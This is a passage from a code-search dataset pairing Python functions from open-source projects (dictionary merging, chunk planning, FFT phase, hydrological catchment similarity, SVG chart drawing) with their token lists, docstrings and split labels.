"d", ")", "in", "enumerate", "(", "dims", ")", ":", "minsize", "=", "remsize", "/", "d", "if", "minsize", ">=", "size", ":", "s", ".", "append", "(", "1", ")", "remsize", "=", "minsize", "continue", "else", ":", "s", ".", "append", "(", "min", "(", "d", ",", "floor", "(", "size", "/", "minsize", ")", ")", ")", "s", "[", "i", "+", "1", ":", "]", "=", "plan", "[", "i", "+", "1", ":", "]", "break", "plan", "[", "axes", "]", "=", "s", "else", ":", "raise", "ValueError", "(", "\"Chunk size not understood, must be tuple or int\"", ")", "return", "plan", ",", "pad" ]
Identify a plan for chunking values along each dimension. Generates an ndarray with the size (in number of elements) of chunks in each dimension. If provided, will estimate chunks for only a subset of axes, leaving all others to the full size of the axis. Parameters ---------- size : string or tuple If str, the average size (in KB) of the chunks in all value dimensions. If int/tuple, an explicit specification of the number chunks in each moving value dimension. axes : tuple, optional, default=None One or more axes to estimate chunks for, if provided any other axes will use one chunk. padding : tuple or int, option, default=None Size over overlapping padding between chunks in each dimension. If tuple, specifies padding along each chunked dimension; if int, all dimensions use same padding; if None, no padding
[ "Identify", "a", "plan", "for", "chunking", "values", "along", "each", "dimension", "." ]
python
test
32.974684
hfaran/progressive
progressive/util.py
https://github.com/hfaran/progressive/blob/e39c7fb17405dbe997c3417a5993b94ef16dab0a/progressive/util.py#L34-L45
def merge_dicts(dicts, deepcopy=False): """Merges dicts In case of key conflicts, the value kept will be from the latter dictionary in the list of dictionaries :param dicts: [dict, ...] :param deepcopy: deepcopy items within dicts """ assert isinstance(dicts, list) and all(isinstance(d, dict) for d in dicts) return dict(chain(*[copy.deepcopy(d).items() if deepcopy else d.items() for d in dicts]))
[ "def", "merge_dicts", "(", "dicts", ",", "deepcopy", "=", "False", ")", ":", "assert", "isinstance", "(", "dicts", ",", "list", ")", "and", "all", "(", "isinstance", "(", "d", ",", "dict", ")", "for", "d", "in", "dicts", ")", "return", "dict", "(", "chain", "(", "*", "[", "copy", ".", "deepcopy", "(", "d", ")", ".", "items", "(", ")", "if", "deepcopy", "else", "d", ".", "items", "(", ")", "for", "d", "in", "dicts", "]", ")", ")" ]
Merges dicts In case of key conflicts, the value kept will be from the latter dictionary in the list of dictionaries :param dicts: [dict, ...] :param deepcopy: deepcopy items within dicts
[ "Merges", "dicts" ]
python
train
37.166667
marl/jams
jams/core.py
https://github.com/marl/jams/blob/b16778399b9528efbd71434842a079f7691a7a66/jams/core.py#L1065-L1087
def to_interval_values(self): '''Extract observation data in a `mir_eval`-friendly format. Returns ------- intervals : np.ndarray [shape=(n, 2), dtype=float] Start- and end-times of all valued intervals `intervals[i, :] = [time[i], time[i] + duration[i]]` labels : list List view of value field. ''' ints, vals = [], [] for obs in self.data: ints.append([obs.time, obs.time + obs.duration]) vals.append(obs.value) if not ints: return np.empty(shape=(0, 2), dtype=float), [] return np.array(ints), vals
[ "def", "to_interval_values", "(", "self", ")", ":", "ints", ",", "vals", "=", "[", "]", ",", "[", "]", "for", "obs", "in", "self", ".", "data", ":", "ints", ".", "append", "(", "[", "obs", ".", "time", ",", "obs", ".", "time", "+", "obs", ".", "duration", "]", ")", "vals", ".", "append", "(", "obs", ".", "value", ")", "if", "not", "ints", ":", "return", "np", ".", "empty", "(", "shape", "=", "(", "0", ",", "2", ")", ",", "dtype", "=", "float", ")", ",", "[", "]", "return", "np", ".", "array", "(", "ints", ")", ",", "vals" ]
Extract observation data in a `mir_eval`-friendly format. Returns ------- intervals : np.ndarray [shape=(n, 2), dtype=float] Start- and end-times of all valued intervals `intervals[i, :] = [time[i], time[i] + duration[i]]` labels : list List view of value field.
[ "Extract", "observation", "data", "in", "a", "mir_eval", "-", "friendly", "format", "." ]
python
valid
27.695652
CivicSpleen/ambry
ambry/orm/column.py
https://github.com/CivicSpleen/ambry/blob/d7f2be4bf1f7ffd086f3fadd4fcae60c32473e42/ambry/orm/column.py#L249-L252
def is_measure(self): """Return true if the colum is a dimension""" from ambry.valuetype.core import ROLE return self.role == ROLE.MEASURE
[ "def", "is_measure", "(", "self", ")", ":", "from", "ambry", ".", "valuetype", ".", "core", "import", "ROLE", "return", "self", ".", "role", "==", "ROLE", ".", "MEASURE" ]
Return true if the colum is a dimension
[ "Return", "true", "if", "the", "colum", "is", "a", "dimension" ]
python
train
39.75
ranaroussi/qtpylib
qtpylib/blotter.py
https://github.com/ranaroussi/qtpylib/blob/0dbbc465fafd9cb9b0f4d10e1e07fae4e15032dd/qtpylib/blotter.py#L887-L950
def _fix_history_sequence(self, df, table): """ fix out-of-sequence ticks/bars """ # remove "Unnamed: x" columns cols = df.columns[df.columns.str.startswith('Unnamed:')].tolist() df.drop(cols, axis=1, inplace=True) # remove future dates df['datetime'] = pd.to_datetime(df['datetime'], utc=True) blacklist = df[df['datetime'] > pd.to_datetime('now', utc=True)] df = df.loc[set(df.index) - set(blacklist)] # .tail() # loop through data, symbol by symbol dfs = [] bad_ids = [blacklist['id'].values.tolist()] for symbol_id in list(df['symbol_id'].unique()): data = df[df['symbol_id'] == symbol_id].copy() # sort by id data.sort_values('id', axis=0, ascending=True, inplace=False) # convert index to column data.loc[:, "ix"] = data.index data.reset_index(inplace=True) # find out of sequence ticks/bars malformed = data.shift(1)[(data['id'] > data['id'].shift(1)) & ( data['datetime'] < data['datetime'].shift(1))] # cleanup rows if malformed.empty: # if all rows are in sequence, just remove last row dfs.append(data) else: # remove out of sequence rows + last row from data index = [ x for x in data.index.values if x not in malformed['ix'].values] dfs.append(data.loc[index]) # add to bad id list (to remove from db) bad_ids.append(list(malformed['id'].values)) # combine all lists data = pd.concat(dfs, sort=True) # flatten bad ids bad_ids = sum(bad_ids, []) # remove bad ids from db if bad_ids: bad_ids = list(map(str, map(int, bad_ids))) self.dbcurr.execute("DELETE FROM greeks WHERE %s IN (%s)" % ( table.lower()[:-1] + "_id", ",".join(bad_ids))) self.dbcurr.execute("DELETE FROM " + table.lower() + " WHERE id IN (%s)" % (",".join(bad_ids))) try: self.dbconn.commit() except Exception as e: self.dbconn.rollback() # return return data.drop(['id', 'ix', 'index'], axis=1)
[ "def", "_fix_history_sequence", "(", "self", ",", "df", ",", "table", ")", ":", "# remove \"Unnamed: x\" columns", "cols", "=", "df", ".", "columns", "[", "df", ".", "columns", ".", "str", ".", "startswith", "(", "'Unnamed:'", ")", "]", ".", "tolist", "(", ")", "df", ".", "drop", "(", "cols", ",", "axis", "=", "1", ",", "inplace", "=", "True", ")", "# remove future dates", "df", "[", "'datetime'", "]", "=", "pd", ".", "to_datetime", "(", "df", "[", "'datetime'", "]", ",", "utc", "=", "True", ")", "blacklist", "=", "df", "[", "df", "[", "'datetime'", "]", ">", "pd", ".", "to_datetime", "(", "'now'", ",", "utc", "=", "True", ")", "]", "df", "=", "df", ".", "loc", "[", "set", "(", "df", ".", "index", ")", "-", "set", "(", "blacklist", ")", "]", "# .tail()", "# loop through data, symbol by symbol", "dfs", "=", "[", "]", "bad_ids", "=", "[", "blacklist", "[", "'id'", "]", ".", "values", ".", "tolist", "(", ")", "]", "for", "symbol_id", "in", "list", "(", "df", "[", "'symbol_id'", "]", ".", "unique", "(", ")", ")", ":", "data", "=", "df", "[", "df", "[", "'symbol_id'", "]", "==", "symbol_id", "]", ".", "copy", "(", ")", "# sort by id", "data", ".", "sort_values", "(", "'id'", ",", "axis", "=", "0", ",", "ascending", "=", "True", ",", "inplace", "=", "False", ")", "# convert index to column", "data", ".", "loc", "[", ":", ",", "\"ix\"", "]", "=", "data", ".", "index", "data", ".", "reset_index", "(", "inplace", "=", "True", ")", "# find out of sequence ticks/bars", "malformed", "=", "data", ".", "shift", "(", "1", ")", "[", "(", "data", "[", "'id'", "]", ">", "data", "[", "'id'", "]", ".", "shift", "(", "1", ")", ")", "&", "(", "data", "[", "'datetime'", "]", "<", "data", "[", "'datetime'", "]", ".", "shift", "(", "1", ")", ")", "]", "# cleanup rows", "if", "malformed", ".", "empty", ":", "# if all rows are in sequence, just remove last row", "dfs", ".", "append", "(", "data", ")", "else", ":", "# remove out of sequence rows + last row from data", "index", "=", "[", "x", "for", "x", "in", "data", ".", "index", ".", "values", "if", "x", "not", "in", "malformed", "[", "'ix'", "]", ".", "values", "]", "dfs", ".", "append", "(", "data", ".", "loc", "[", "index", "]", ")", "# add to bad id list (to remove from db)", "bad_ids", ".", "append", "(", "list", "(", "malformed", "[", "'id'", "]", ".", "values", ")", ")", "# combine all lists", "data", "=", "pd", ".", "concat", "(", "dfs", ",", "sort", "=", "True", ")", "# flatten bad ids", "bad_ids", "=", "sum", "(", "bad_ids", ",", "[", "]", ")", "# remove bad ids from db", "if", "bad_ids", ":", "bad_ids", "=", "list", "(", "map", "(", "str", ",", "map", "(", "int", ",", "bad_ids", ")", ")", ")", "self", ".", "dbcurr", ".", "execute", "(", "\"DELETE FROM greeks WHERE %s IN (%s)\"", "%", "(", "table", ".", "lower", "(", ")", "[", ":", "-", "1", "]", "+", "\"_id\"", ",", "\",\"", ".", "join", "(", "bad_ids", ")", ")", ")", "self", ".", "dbcurr", ".", "execute", "(", "\"DELETE FROM \"", "+", "table", ".", "lower", "(", ")", "+", "\" WHERE id IN (%s)\"", "%", "(", "\",\"", ".", "join", "(", "bad_ids", ")", ")", ")", "try", ":", "self", ".", "dbconn", ".", "commit", "(", ")", "except", "Exception", "as", "e", ":", "self", ".", "dbconn", ".", "rollback", "(", ")", "# return", "return", "data", ".", "drop", "(", "[", "'id'", ",", "'ix'", ",", "'index'", "]", ",", "axis", "=", "1", ")" ]
fix out-of-sequence ticks/bars
[ "fix", "out", "-", "of", "-", "sequence", "ticks", "/", "bars" ]
python
train
36.015625
totalgood/pugnlp
src/pugnlp/util.py
https://github.com/totalgood/pugnlp/blob/c43445b14afddfdeadc5f3076675c9e8fc1ee67c/src/pugnlp/util.py#L1413-L1448
def strip_br(s): r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text so only the last element in a sequence is "stripped" >>> strip_br(' Title <BR> ') ' Title' >>> strip_br(list(range(1, 4))) [1, 2, 3] >>> strip_br((' Column 1<br />', ' Last Column < br / > ')) (' Column 1<br />', ' Last Column') >>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />']) ['name', 'rank', 'serial\nnumber', 'date'] >>> strip_br(None) >>> strip_br([]) [] >>> strip_br(()) () >>> strip_br(('one element<br>',)) ('one element',) """ if isinstance(s, basestring): return re.sub(r'\s*<\s*[Bb][Rr]\s*[/]?\s*>\s*$', '', s) elif isinstance(s, (tuple, list)): # strip just the last element in a list or tuple try: return type(s)(list(s)[:-1] + [strip_br(s[-1])]) except (IndexError, ValueError, AttributeError, TypeError): # len(s) == 0 return s else: try: return type(s)(strip_br(str(s))) except (IndexError, ValueError, AttributeError, TypeError): # s is None return s
[ "def", "strip_br", "(", "s", ")", ":", "if", "isinstance", "(", "s", ",", "basestring", ")", ":", "return", "re", ".", "sub", "(", "r'\\s*<\\s*[Bb][Rr]\\s*[/]?\\s*>\\s*$'", ",", "''", ",", "s", ")", "elif", "isinstance", "(", "s", ",", "(", "tuple", ",", "list", ")", ")", ":", "# strip just the last element in a list or tuple", "try", ":", "return", "type", "(", "s", ")", "(", "list", "(", "s", ")", "[", ":", "-", "1", "]", "+", "[", "strip_br", "(", "s", "[", "-", "1", "]", ")", "]", ")", "except", "(", "IndexError", ",", "ValueError", ",", "AttributeError", ",", "TypeError", ")", ":", "# len(s) == 0", "return", "s", "else", ":", "try", ":", "return", "type", "(", "s", ")", "(", "strip_br", "(", "str", "(", "s", ")", ")", ")", "except", "(", "IndexError", ",", "ValueError", ",", "AttributeError", ",", "TypeError", ")", ":", "# s is None", "return", "s" ]
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text so only the last element in a sequence is "stripped" >>> strip_br(' Title <BR> ') ' Title' >>> strip_br(list(range(1, 4))) [1, 2, 3] >>> strip_br((' Column 1<br />', ' Last Column < br / > ')) (' Column 1<br />', ' Last Column') >>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />']) ['name', 'rank', 'serial\nnumber', 'date'] >>> strip_br(None) >>> strip_br([]) [] >>> strip_br(()) () >>> strip_br(('one element<br>',)) ('one element',)
[ "r", "Strip", "the", "trailing", "html", "linebreak", "character", "(", "<BR", "/", ">", ")", "from", "a", "string", "or", "sequence", "of", "strings" ]
python
train
34.472222
pmacosta/peng
peng/wave_functions.py
https://github.com/pmacosta/peng/blob/976935377adaa3de26fc5677aceb2cdfbd6f93a7/peng/wave_functions.py#L728-L782
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True): r""" Return the phase of the Fast Fourier Transform of a waveform. :param wave: Waveform :type wave: :py:class:`peng.eng.Waveform` :param npoints: Number of points to use in the transform. If **npoints** is less than the size of the independent variable vector the waveform is truncated; if **npoints** is greater than the size of the independent variable vector, the waveform is zero-padded :type npoints: positive integer :param indep_min: Independent vector start point of computation :type indep_min: integer or float :param indep_max: Independent vector stop point of computation :type indep_max: integer or float :param unwrap: Flag that indicates whether phase should change phase shifts to their :code:`2*pi` complement (True) or not (False) :type unwrap: boolean :param rad: Flag that indicates whether phase should be returned in radians (True) or degrees (False) :type rad: boolean :rtype: :py:class:`peng.eng.Waveform` .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]] .. Auto-generated exceptions documentation for .. peng.wave_functions.fftp :raises: * RuntimeError (Argument \`indep_max\` is not valid) * RuntimeError (Argument \`indep_min\` is not valid) * RuntimeError (Argument \`npoints\` is not valid) * RuntimeError (Argument \`rad\` is not valid) * RuntimeError (Argument \`unwrap\` is not valid) * RuntimeError (Argument \`wave\` is not valid) * RuntimeError (Incongruent \`indep_min\` and \`indep_max\` arguments) * RuntimeError (Non-uniform sampling) .. [[[end]]] """ return phase(fft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad)
[ "def", "fftp", "(", "wave", ",", "npoints", "=", "None", ",", "indep_min", "=", "None", ",", "indep_max", "=", "None", ",", "unwrap", "=", "True", ",", "rad", "=", "True", ")", ":", "return", "phase", "(", "fft", "(", "wave", ",", "npoints", ",", "indep_min", ",", "indep_max", ")", ",", "unwrap", "=", "unwrap", ",", "rad", "=", "rad", ")" ]
r""" Return the phase of the Fast Fourier Transform of a waveform. :param wave: Waveform :type wave: :py:class:`peng.eng.Waveform` :param npoints: Number of points to use in the transform. If **npoints** is less than the size of the independent variable vector the waveform is truncated; if **npoints** is greater than the size of the independent variable vector, the waveform is zero-padded :type npoints: positive integer :param indep_min: Independent vector start point of computation :type indep_min: integer or float :param indep_max: Independent vector stop point of computation :type indep_max: integer or float :param unwrap: Flag that indicates whether phase should change phase shifts to their :code:`2*pi` complement (True) or not (False) :type unwrap: boolean :param rad: Flag that indicates whether phase should be returned in radians (True) or degrees (False) :type rad: boolean :rtype: :py:class:`peng.eng.Waveform` .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]] .. Auto-generated exceptions documentation for .. peng.wave_functions.fftp :raises: * RuntimeError (Argument \`indep_max\` is not valid) * RuntimeError (Argument \`indep_min\` is not valid) * RuntimeError (Argument \`npoints\` is not valid) * RuntimeError (Argument \`rad\` is not valid) * RuntimeError (Argument \`unwrap\` is not valid) * RuntimeError (Argument \`wave\` is not valid) * RuntimeError (Incongruent \`indep_min\` and \`indep_max\` arguments) * RuntimeError (Non-uniform sampling) .. [[[end]]]
[ "r", "Return", "the", "phase", "of", "the", "Fast", "Fourier", "Transform", "of", "a", "waveform", "." ]
python
test
34.363636
christophertbrown/bioscripts
ctbBio/transform.py
https://github.com/christophertbrown/bioscripts/blob/83b2566b3a5745437ec651cd6cafddd056846240/ctbBio/transform.py#L95-L105
def norm(table): """ fit to normal distribution """ print('# norm dist is broken', file=sys.stderr) exit() from matplotlib.pyplot import hist as hist t = [] for i in table: t.append(np.ndarray.tolist(hist(i, bins = len(i), normed = True)[0])) return t
[ "def", "norm", "(", "table", ")", ":", "print", "(", "'# norm dist is broken'", ",", "file", "=", "sys", ".", "stderr", ")", "exit", "(", ")", "from", "matplotlib", ".", "pyplot", "import", "hist", "as", "hist", "t", "=", "[", "]", "for", "i", "in", "table", ":", "t", ".", "append", "(", "np", ".", "ndarray", ".", "tolist", "(", "hist", "(", "i", ",", "bins", "=", "len", "(", "i", ")", ",", "normed", "=", "True", ")", "[", "0", "]", ")", ")", "return", "t" ]
fit to normal distribution
[ "fit", "to", "normal", "distribution" ]
python
train
25.909091
ljcooke/see
see/tools.py
https://github.com/ljcooke/see/blob/4cbc67a31c92367977ecb4bbb1f0736fa688a6ba/see/tools.py#L16-L27
def char_width(char): """ Get the display length of a unicode character. """ if ord(char) < 128: return 1 elif unicodedata.east_asian_width(char) in ('F', 'W'): return 2 elif unicodedata.category(char) in ('Mn',): return 0 else: return 1
[ "def", "char_width", "(", "char", ")", ":", "if", "ord", "(", "char", ")", "<", "128", ":", "return", "1", "elif", "unicodedata", ".", "east_asian_width", "(", "char", ")", "in", "(", "'F'", ",", "'W'", ")", ":", "return", "2", "elif", "unicodedata", ".", "category", "(", "char", ")", "in", "(", "'Mn'", ",", ")", ":", "return", "0", "else", ":", "return", "1" ]
Get the display length of a unicode character.
[ "Get", "the", "display", "length", "of", "a", "unicode", "character", "." ]
python
train
23.833333
OpenHydrology/floodestimation
floodestimation/collections.py
https://github.com/OpenHydrology/floodestimation/blob/782da7c5abd1348923129efe89fb70003ebb088c/floodestimation/collections.py#L118-L173
def most_similar_catchments(self, subject_catchment, similarity_dist_function, records_limit=500, include_subject_catchment='auto'): """ Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function` :param subject_catchment: subject catchment to find similar catchments for :type subject_catchment: :class:`floodestimation.entities.Catchment` :param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both :class:`floodestimation.entities.Catchment` objects :param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03 - `force`: always include subject catchment having at least 10 years of data - `exclude`: do not include the subject catchment :type include_subject_catchment: str :return: list of catchments sorted by similarity :type: list of :class:`floodestimation.entities.Catchment` """ if include_subject_catchment not in ['auto', 'force', 'exclude']: raise ValueError("Parameter `include_subject_catchment={}` invalid.".format(include_subject_catchment) + "Must be one of `auto`, `force` or `exclude`.") query = (self.db_session.query(Catchment). join(Catchment.descriptors). join(Catchment.amax_records). filter(Catchment.id != subject_catchment.id, Catchment.is_suitable_for_pooling, or_(Descriptors.urbext2000 < 0.03, Descriptors.urbext2000 == None), AmaxRecord.flag == 0). group_by(Catchment). having(func.count(AmaxRecord.catchment_id) >= 10)) # At least 10 AMAX records catchments = query.all() # Add subject catchment if required (may not exist in database, so add after querying db if include_subject_catchment == 'force': if len(subject_catchment.amax_records) >= 10: # Never include short-record catchments catchments.append(subject_catchment) elif include_subject_catchment == 'auto': if len(subject_catchment.amax_records) >= 10 and subject_catchment.is_suitable_for_pooling and \ (subject_catchment.descriptors.urbext2000 < 0.03 or subject_catchment.descriptors.urbext2000 is None): catchments.append(subject_catchment) # Store the similarity distance as an additional attribute for each catchment for catchment in catchments: catchment.similarity_dist = similarity_dist_function(subject_catchment, catchment) # Then simply sort by this attribute catchments.sort(key=attrgetter('similarity_dist')) # Limit catchments until total amax_records counts is at least `records_limit`, default 500 amax_records_count = 0 catchments_limited = [] for catchment in catchments: catchments_limited.append(catchment) amax_records_count += catchment.record_length if amax_records_count >= records_limit: break return catchments_limited
[ "def", "most_similar_catchments", "(", "self", ",", "subject_catchment", ",", "similarity_dist_function", ",", "records_limit", "=", "500", ",", "include_subject_catchment", "=", "'auto'", ")", ":", "if", "include_subject_catchment", "not", "in", "[", "'auto'", ",", "'force'", ",", "'exclude'", "]", ":", "raise", "ValueError", "(", "\"Parameter `include_subject_catchment={}` invalid.\"", ".", "format", "(", "include_subject_catchment", ")", "+", "\"Must be one of `auto`, `force` or `exclude`.\"", ")", "query", "=", "(", "self", ".", "db_session", ".", "query", "(", "Catchment", ")", ".", "join", "(", "Catchment", ".", "descriptors", ")", ".", "join", "(", "Catchment", ".", "amax_records", ")", ".", "filter", "(", "Catchment", ".", "id", "!=", "subject_catchment", ".", "id", ",", "Catchment", ".", "is_suitable_for_pooling", ",", "or_", "(", "Descriptors", ".", "urbext2000", "<", "0.03", ",", "Descriptors", ".", "urbext2000", "==", "None", ")", ",", "AmaxRecord", ".", "flag", "==", "0", ")", ".", "group_by", "(", "Catchment", ")", ".", "having", "(", "func", ".", "count", "(", "AmaxRecord", ".", "catchment_id", ")", ">=", "10", ")", ")", "# At least 10 AMAX records", "catchments", "=", "query", ".", "all", "(", ")", "# Add subject catchment if required (may not exist in database, so add after querying db", "if", "include_subject_catchment", "==", "'force'", ":", "if", "len", "(", "subject_catchment", ".", "amax_records", ")", ">=", "10", ":", "# Never include short-record catchments", "catchments", ".", "append", "(", "subject_catchment", ")", "elif", "include_subject_catchment", "==", "'auto'", ":", "if", "len", "(", "subject_catchment", ".", "amax_records", ")", ">=", "10", "and", "subject_catchment", ".", "is_suitable_for_pooling", "and", "(", "subject_catchment", ".", "descriptors", ".", "urbext2000", "<", "0.03", "or", "subject_catchment", ".", "descriptors", ".", "urbext2000", "is", "None", ")", ":", "catchments", ".", "append", "(", "subject_catchment", ")", "# Store the similarity distance as an additional attribute for each catchment", "for", "catchment", "in", "catchments", ":", "catchment", ".", "similarity_dist", "=", "similarity_dist_function", "(", "subject_catchment", ",", "catchment", ")", "# Then simply sort by this attribute", "catchments", ".", "sort", "(", "key", "=", "attrgetter", "(", "'similarity_dist'", ")", ")", "# Limit catchments until total amax_records counts is at least `records_limit`, default 500", "amax_records_count", "=", "0", "catchments_limited", "=", "[", "]", "for", "catchment", "in", "catchments", ":", "catchments_limited", ".", "append", "(", "catchment", ")", "amax_records_count", "+=", "catchment", ".", "record_length", "if", "amax_records_count", ">=", "records_limit", ":", "break", "return", "catchments_limited" ]
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function` :param subject_catchment: subject catchment to find similar catchments for :type subject_catchment: :class:`floodestimation.entities.Catchment` :param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both :class:`floodestimation.entities.Catchment` objects :param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03 - `force`: always include subject catchment having at least 10 years of data - `exclude`: do not include the subject catchment :type include_subject_catchment: str :return: list of catchments sorted by similarity :type: list of :class:`floodestimation.entities.Catchment`
[ "Return", "a", "list", "of", "catchments", "sorted", "by", "hydrological", "similarity", "defined", "by", "similarity_distance_function" ]
python
train
59.357143
jaraco/svg.charts
svg/charts/plot.py
https://github.com/jaraco/svg.charts/blob/23053497b3f1af4e760f355050107ae3bc05909d/svg/charts/plot.py#L326-L340
def __draw_constant_line(self, value_label_style): "Draw a constant line on the y-axis with the label" value, label, style = value_label_style start = self.transform_output_coordinates((0, value))[1] stop = self.graph_width path = etree.SubElement(self.graph, 'path', { 'd': 'M 0 %(start)s h%(stop)s' % locals(), 'class': 'constantLine'}) if style: path.set('style', style) text = etree.SubElement(self.graph, 'text', { 'x': str(2), 'y': str(start - 2), 'class': 'constantLine'}) text.text = label
[ "def", "__draw_constant_line", "(", "self", ",", "value_label_style", ")", ":", "value", ",", "label", ",", "style", "=", "value_label_style", "start", "=", "self", ".", "transform_output_coordinates", "(", "(", "0", ",", "value", ")", ")", "[", "1", "]", "stop", "=", "self", ".", "graph_width", "path", "=", "etree", ".", "SubElement", "(", "self", ".", "graph", ",", "'path'", ",", "{", "'d'", ":", "'M 0 %(start)s h%(stop)s'", "%", "locals", "(", ")", ",", "'class'", ":", "'constantLine'", "}", ")", "if", "style", ":", "path", ".", "set", "(", "'style'", ",", "style", ")", "text", "=", "etree", ".", "SubElement", "(", "self", ".", "graph", ",", "'text'", ",", "{", "'x'", ":", "str", "(", "2", ")", ",", "'y'", ":", "str", "(", "start", "-", "2", ")", ",", "'class'", ":", "'constantLine'", "}", ")", "text", ".", "text", "=", "label" ]
Draw a constant line on the y-axis with the label
[ "Draw", "a", "constant", "line", "on", "the", "y", "-", "axis", "with", "the", "label" ]
python
test
34.466667